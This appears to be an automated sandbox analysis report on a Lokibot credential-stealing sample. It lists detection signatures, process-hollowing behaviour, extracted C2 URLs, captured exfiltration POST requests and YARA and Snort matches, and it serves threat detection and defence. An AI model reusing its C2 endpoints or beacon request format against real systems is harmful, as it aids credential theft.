
Windows Analysis Report FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe

Overview

General Information

Sample Name: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
Analysis ID: 525634
MD5: 2ae5473d26a235b7ab3ee2d632514d60
SHA1: 40cbf4bffbe3a0c691aaac5e51ab93764958e5b9
SHA256: fadae8a98643b8305b18d587f3cc16534eacd884e84753c92e1e64c3336d91c3
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe" MD5: 2AE5473D26A235B7AB3EE2D632514D60)
    • vbc.exe (PID: 7148 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
(5 of 30 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x13280:$s2: https://
  • 0x16c74:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x133fc:$a2: last_compatible_version
1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x123ff:$des3: 68 03 66 00 00
  • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.0.vbc.exe.400000.5.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x13e80:$s2: https://
  • 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
(5 of 77 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Multi AV Scanner detection for submitted file
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Virustotal: Detection: 63%
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Metadefender: Detection: 54%
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | ReversingLabs: Detection: 75%
Antivirus / Scanner detection for submitted sample
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Avira: detected
Multi AV Scanner detection for domain / URL
Source: publicspeaking.co.id | Virustotal: Detection: 8%
Source: http://publicspeaking.co.id/seun/Panel/five/fre.php | Virustotal: Detection: 5%
Machine Learning detection for sample
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Joe Sandbox ML: detected
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49741 -> 216.239.36.21:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 216.239.36.21:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49741 -> 216.239.36.21:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49741 -> 216.239.36.21:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 216.239.34.21:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 216.239.34.21:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 216.239.34.21:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49742 -> 216.239.34.21:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 216.239.36.21:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 216.239.36.21:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 216.239.36.21:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 216.239.36.21:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 216.239.34.21:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 216.239.34.21:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 216.239.34.21:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 216.239.34.21:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: global traffic | HTTP traffic detected:
  POST /seun/Panel/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: publicspeaking.co.id
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: F3A57278
  Content-Length: 190
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /seun/Panel/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: publicspeaking.co.id
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: F3A57278
  Content-Length: 190
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /seun/Panel/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: publicspeaking.co.id
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: F3A57278
  Content-Length: 163
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /seun/Panel/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: publicspeaking.co.id
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: F3A57278
  Content-Length: 163
  Connection: close
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: vbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmp | String found in binary or memory: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
Source: vbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmp | String found in binary or memory: https://publicspeaking.co.id/seun/Panel/five/fre.php
Source: unknown | HTTP traffic detected:
  POST /seun/Panel/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: publicspeaking.co.id
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: F3A57278
  Content-Length: 190
  Connection: close
Source: unknown | DNS traffic detected: queries for: publicspeaking.co.id

System Summary:

Malicious sample detected (through community Yara rule)
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
